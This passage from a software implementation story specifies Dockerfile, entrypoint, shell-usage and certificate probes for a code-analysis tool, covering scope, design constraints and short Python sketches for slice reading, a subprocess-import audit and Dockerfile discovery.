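            node, (ast.Module, ast.ClassDef, ast.FunctionDef, ast.AsyncFunctionDef)
        ):
            continue
        body = node.body
        if not body:
            continue
        first = body[0]
        # A docstring is a bare string constant as the first statement.
        if (
            isinstance(first, ast.Expr)
            and isinstance(first.value, ast.Constant)
            and isinstance(first.value.value, str)
        ):
            end = first.end_lineno or first.lineno
            docstring_lines.update(range(first.lineno, end + 1))

    count = 0
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or lineno in docstring_lines:
            continue
        count += 1
    return count
```

Imports are counted and docstrings are not, matching the AC-V12 wording; a line of code with a trailing comment still counts as source.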
Files to touch
- New: src/codegenie/probes/layer_c/dockerfile.py, src/codegenie/probes/layer_c/entrypoint.py, src/codegenie/probes/layer_c/shell_usage.py, src/codegenie/probes/layer_c/certificate.py.
- New schemas: src/codegenie/schema/probes/layer_c/{dockerfile,entrypoint,shell_usage,certificate}.schema.json.
- New tests: tests/unit/probes/layer_c/{test_dockerfile.py,test_entrypoint.py,test_shell_usage.py,test_certificate.py}.
- New fixtures: tests/fixtures/dockerfiles/{single_stage,two_stage,three_stage,no_dockerfile,evil_run_command,multi_dockerfile}/....
- Possibly extend: src/codegenie/schema/repo-context.schema.json — wire the four sub-schemas (mirror how S4-07 wired Layer B).
Out of scope
- The replacement catalog (localv2.md §5.3 C5 — the YAML-driven shell-replacement classifier) — defer to Phase 3 / Phase 7 when the distroless planner consumes it; this probe emits static evidence only.
- Falling back to BuildKit's buildctl debug dump-llb (localv2.md §5.3 C1 fallback) — explicitly not in Phase 2 (would require buildctl in ALLOWED_BINARIES, no ADR). If the hand-rolled parser proves insufficient on the portfolio fixtures, surface as an ADR-amend candidate in Phase 3.
- secrets in Dockerfile detection (COPY --chown=...:... secrets.json /app) — gitleaks (S6-07) catches secrets at the file level; this probe surfaces the COPY directive literally and lets gitleaks do its job.
- The runtime_trace sub-schema — landed by S5-02 / S5-04 (this story validates the slice shape only as a downstream reader).
- SBOMProbe / CVEProbe — S5-04.
Notes for the implementer
- requires is a class attribute, not a @register_probe kwarg — and it is metadata-only in Phase 2. Two precedents to follow:
  - 02-ADR-0003 picked Option D: @register_probe(...) accepts only heaviness + runs_last. The requires: list[str] field is on the Probe ABC (localv2.md §4, frozen). Passing requires= to the decorator will either be a TypeError or — worse — silently accepted by a permissive **kwargs and dropped on the floor.
  - S5-02 set the precedent: class RuntimeTraceProbe(Probe): requires: list[str] = []. S4-01 validation (_validation/S4-01-index-health-probe.md) explicitly catalogued the equivalent phantom in IndexHealthProbe and forced the fix; this story carries the precedent forward.

  The coordinator does NOT topologically sort by requires (rejected as Option C in 02-ADR-0003 — "lies about dependencies"). Dispatch order within heaviness="light" is concurrent under the single asyncio.Semaphore. AC-V2 is what makes Layer C correct: each sibling-slice reader degrades to confidence="unavailable" when the upstream raw artifact isn't yet on disk. Do NOT propose a coordinator-side topo-sort in this story; that's a separate ADR conversation. Do NOT propose adding requires to @register_probe's signature; that's a re-litigation of 02-ADR-0003.
- Sibling-slice access is disk-anchored — reuse the S4-01 helper. ProbeContext is contract-frozen (Phase 0 ADR-0007). It does not carry sibling_slices. The only Phase-2-blessed path to read a sibling's slice is read_raw_slices(raw_dir(repo.root)) at src/codegenie/output/paths.py (or the canonical location S4-01 wired). With B2 (S4-01) + ShellUsageProbe + EntrypointProbe + CertificateProbe, this is now the 4th consumer of read_raw_slices — the rule-of-three threshold is well past, the helper IS the kernel. Do not re-implement disk IO in any of the three Layer C readers. AC-V1 + Test 19 (AST audit) is the structural enforcement.
- Directive tagged-union opportunity (optional — implementer's call, not an AC). The Dockerfile _tokenize_dockerfile_line(line: str) -> Directive | None helper is a natural home for a tagged-union sum type: Directive = FromDirective | RunDirective | CopyDirective | UserDirective | ExposeDirective | HealthcheckDirective | CmdDirective | EntrypointDirective | WorkdirDirective | EnvDirective | LabelDirective | ArgDirective | OnbuildDirective | StopsignalDirective | ShellDirective | VolumeDirective | MaintainerDirective | AddDirective. Each variant is a frozen Pydantic model with a Literal["..."] discriminator on kind. The parser dispatch becomes a match directive: case FromDirective(): ... case _: assert_never(directive) — exhaustive checking via the compiler / mypy --warn-unreachable. This is make illegal states unrepresentable + Open/Closed via match exhaustiveness (adding a new directive forces a match arm). Trade-off: ≥ 18 small model definitions add ~30–50 LOC just for the types. The LOC budget is AC-V12 (≤ 100 source lines per module). If you can fit the sum-type version under budget (likely by moving the directive models into a sibling module src/codegenie/probes/layer_c/_dockerfile_directives.py not counted against dockerfile.py's budget), prefer it — the structural enforcement is worth it. If not, a tuple[Literal["FROM", "RUN", ...], dict[str, str]] is acceptable and the parser keeps the exhaustive match on kind. The validator does not mandate the sum-type form; the only mandate is the _tokenize_dockerfile_line extract (Refactor step 1).
- Original "requires mechanism" note retained context (deprecated). The earlier version of this story said "S5-04 introduces the requires mechanism if not already in S1-08 — surface in Notes for the implementer." That framing is incorrect — see the first bullet above. S5-04 will hit the same Consistency block at its own validation pass and resolve the same way (class-attribute, metadata-only, AC-V2-style absent-upstream handling).
- localv2.md §5.3 C1 names dockerfile (the Python library) as the parser of choice. Evaluate it: if it ships with shell evaluation enabled by default (or imports anything from subprocess), we cannot adopt it. Hand-rolled parser is the safe fallback — Dockerfile's surface is small (~20 directives), and the test corpus covers the shapes Phase 3 will need. Decision criterion: zero shell evaluation, zero subprocess imports. If the vendored library passes the audit, prefer it; otherwise hand-roll. Document the decision in the module docstring.
- secrets in Dockerfile path: a RUN command containing AWS_SECRET_ACCESS_KEY=AKIA… flows through the writer chokepoint and is redacted via S3-01's SecretRedactor. The dockerfile parser does not filter; it captures the literal, the writer redacts. This is the same chokepoint discipline Layer G scanners use.
- requires ordering vs cache. If RuntimeTraceProbe cache-HITs (per S5-02), the downstream probes (ShellUsageProbe, CertificateProbe) still need the cached slice's content. The coordinator's slice-map (Phase 0) carries cached output to dependent probes; no special handling here.
- Multi-Dockerfile semantics. Some repos have Dockerfile for production + Dockerfile.dev for development + per-app Dockerfiles under apps/<service>/Dockerfile. We emit all of them; RuntimeTraceProbe (S5-02) traces only one (the canonical Dockerfile at repo root, configurable via .codegenie/scenarios.yaml in a future ADR). Phase 3's planner reads the parsed list and picks which one to migrate.
- shell_usage.py replacement catalog deferral. The catalog (localv2.md §5.3 C5) is the kind of org-uniqueness data that lives under ~/.codegenie/replacement-catalogs/ and is loaded by a Phase 3 / Phase 7 loader — not Phase 2. The CLAUDE.md commitment "organizational uniqueness as data, not prompts" applies here: Phase 2 emits the evidence; Phase 3+ owns the catalog. Resist landing a catalog loader here even if the YAML format is obvious.
- certificate_source classification table. Keep it small (4 buckets). If the portfolio surfaces a fifth pattern, extend via ADR-amend (small, additive).
- additionalProperties: false is non-negotiable per Phase 1 ADR-0004; the rejection test per probe is the structural enforcement.
- mypy --warn-unreachable — these four modules are simple enough that an exhaustive match isn't load-bearing; the S1-11 per-module override list need not include them. If a match on a discriminated union shows up (e.g., on certificate_source's Literal), add the override.
- LOC budget. ≤ 100 LOC per probe is the design discipline. If you find yourself over 120 LOC, the parser has too much logic — extract pure helpers and keep the
run()method thin (10–20 LOC).
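
Sketch for the absent-upstream rule in the `read_raw_slices` note above: a sibling-slice reader that degrades to `confidence="unavailable"` when the upstream raw file is missing. The real helper's signature and return shape are not shown in this story, so `read_raw_slices_stub` is a hypothetical stand-in, and the `shell_invocations` field and the `"high"` confidence value are placeholders, not the S5-02 schema.

```python
import json
from pathlib import Path
from typing import Any


def read_raw_slices_stub(raw_dir: Path) -> dict[str, Any]:
    """HYPOTHETICAL stand-in for the project's read_raw_slices helper.

    Assumption: the helper maps slice name -> parsed JSON for every
    <name>.json under the raw directory, and returns {} if it is absent.
    """
    if not raw_dir.is_dir():
        return {}
    return {
        path.stem: json.loads(path.read_text(encoding="utf-8"))
        for path in sorted(raw_dir.glob("*.json"))
    }


def shell_usage_slice(slices: dict[str, Any]) -> dict[str, Any]:
    """Pure function: no disk IO here, only the already-loaded slices."""
    trace = slices.get("runtime_trace")
    if trace is None:
        # Upstream artifact absent: degrade instead of raising.
        return {"confidence": "unavailable", "reason": "runtime_trace slice absent"}
    # "high" and "shell_invocations" are placeholder names for this sketch.
    return {
        "confidence": "high",
        "shell_invocations": trace.get("shell_invocations", []),
    }
```

Keeping the reader a pure function of the loaded slices means the probe module itself never touches the filesystem; in the real probe the only IO call would be the blessed helper.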
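
Sketch for the "zero subprocess imports" half of the parser-library decision criterion above: a first-pass audit over a module's source using the stdlib `ast` module. The function name and the forbidden set are illustrative. It only catches static `import` statements; dynamic imports (`importlib`, `__import__`) and shell evaluation through other routes such as `os.system` would need separate checks.

```python
import ast

# Illustrative forbidden set; extend as the audit requires.
FORBIDDEN_MODULES = frozenset({"subprocess"})


def find_forbidden_imports(
    source: str, forbidden: frozenset[str] = FORBIDDEN_MODULES
) -> list[str]:
    """Return one message per static import of a forbidden top-level module."""
    hits: list[tuple[int, str]] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in forbidden:
                    hits.append((node.lineno, f"import {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            # level > 0 is a relative import, which cannot be a stdlib module.
            if node.level == 0 and node.module:
                if node.module.split(".")[0] in forbidden:
                    hits.append((node.lineno, f"from {node.module} import ..."))
    # ast.walk does not guarantee source order, so sort by line number.
    return [f"line {lineno}: {text}" for lineno, text in sorted(hits)]
```

Run it over every `.py` file of the candidate library; an empty result for all files is necessary but not sufficient for adoption under the criterion.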
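
Sketch for the multi-Dockerfile note above: discovering the three shapes it names (root `Dockerfile`, `Dockerfile.<suffix>` variants, and `apps/<service>/Dockerfile`). The function name and the exact glob patterns are assumptions; the real probe may recognise more layouts.

```python
from pathlib import Path

# Assumed patterns, taken from the three shapes named in the note.
DOCKERFILE_PATTERNS = ("Dockerfile", "Dockerfile.*", "apps/*/Dockerfile")


def discover_dockerfiles(repo_root: Path) -> list[str]:
    """Return repo-relative POSIX paths of every matching Dockerfile, sorted."""
    found: set[str] = set()
    for pattern in DOCKERFILE_PATTERNS:
        for path in repo_root.glob(pattern):
            if path.is_file():
                found.add(path.relative_to(repo_root).as_posix())
    return sorted(found)
```

Returning a sorted list of relative paths keeps the emitted slice deterministic across runs, so the Phase 3 planner sees a stable list to pick from.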